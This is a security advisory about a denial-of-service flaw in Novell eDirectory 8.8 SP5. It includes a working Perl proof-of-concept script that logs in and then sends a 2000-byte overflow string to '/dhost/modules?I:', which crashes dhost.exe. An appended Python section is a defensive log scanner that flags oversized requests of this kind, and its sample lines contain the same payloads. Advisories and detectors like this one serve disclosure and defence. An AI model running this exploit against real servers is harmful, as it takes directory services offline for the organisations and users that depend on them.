Novell eDirectory 8.8 SP5 Denial of Service



Product:
Novell eDirectory 8.8 SP5 for Windows

********************************************************************************
Vulnerability:
Denial of Service

********************************************************************************
Discussion:
The vulnerability is in '/dhost/modules?I:'.
Sending a long string to '/dhost/modules?I:' causes a DoS by crashing dhost.exe.
Another bug, in 'modules?L:', was published last week.
It has not been patched yet either.

********************************************************************************
Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Germany - Austria - Switzerland
www.hackattack.com

********************************************************************************

Original Advisory
www.hackattack.com

********************************************************************************
PoC:

#!/usr/bin/perl
# Vulnerability found by HACKATTACK

use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;

$address = $ARGV[0];

if (!$ARGV[0]) {
    print "Usage: perl $0 address\n";
    exit();
}

$login  = "$address/_LOGIN_SERVER_";   # login page
$url    = "$address/dhost/";
$module = "modules?I:";
$buffer = "A" x 2000;                  # long string appended to the module request
$vuln   = $module . $buffer;

# Edit the username and password.
$user = "username";
$pass = "password";

$cookie_file = "cookies.txt";          # file used for the session cookie jar
$url_timeout = 30;                     # request timeout in seconds

my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file", autosave => 1));
$mechanize->timeout($url_timeout);

# Log in first; the request to /dhost/ is sent with the authenticated session.
$res = $mechanize->request(HTTP::Request->new('GET', "$login"));

$mechanize->submit_form(
    form_name => "authenticator",
    fields    => {
        usr => $user,
        pwd => $pass,
    },
    button    => 'Login',
);

# Send the long string to /dhost/modules?I:
$response2 = $mechanize->get("$url$vuln");

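Added example, not part of the original advisory: a Python check that flags requests to '/dhost/modules?I:' or 'modules?L:' carrying an oversized argument in web or proxy logs. The common-log-style line format, the 256-byte threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: any argument longer than this is abnormal. The advisory's PoC
# sends 2000 bytes; the real crash threshold is not stated on the page.
MAX_ARG_LEN = 256

# Request line inside a common-log-format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# /dhost/modules?<letter>:<argument> covers both 'I:' and 'L:' from the advisory.
MODULES_RE = re.compile(r'^/dhost/modules\?(?P<op>[A-Za-z]):(?P<arg>.*)$', re.S)


def find_oversized_module_requests(lines, max_len=MAX_ARG_LEN):
    """Return (line_no, client, op, arg_len) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        req = REQUEST_RE.search(line)
        if not req:
            continue  # not an HTTP request entry
        # Decode percent-encoding so an encoded ':' does not slip past the match.
        target = unquote(req.group("target"))
        m = MODULES_RE.match(target)
        if m and len(m.group("arg")) > max_len:
            client = line.split(" ", 1)[0]
            hits.append((line_no, client, m.group("op").upper(), len(m.group("arg"))))
    return hits


# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - admin [01/Jan/2010:10:00:00 +0000] "GET /dhost/modules?I:example HTTP/1.1" 200 512',
    '10.0.0.9 - admin [01/Jan/2010:10:00:07 +0000] "GET /dhost/modules?I:' + "A" * 2000 + ' HTTP/1.1" - 0',
    '10.0.0.9 - admin [01/Jan/2010:10:00:09 +0000] "GET /dhost/modules?L%3A' + "B" * 300 + ' HTTP/1.1" - 0',
    '10.0.0.7 - - [01/Jan/2010:10:01:00 +0000] "GET /dhost/ HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for line_no, client, op, arg_len in find_oversized_module_requests(SAMPLE_LOG):
        print(f"line {line_no}: {client} sent modules?{op}: with {arg_len}-byte argument")
```
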
About HACKATTACK
================
HACKATTACK IT SECURITY GmbH is a penetration testing and security auditing company located in Germany and Austria.

More information about HACKATTACK at
http://www.hackattack.com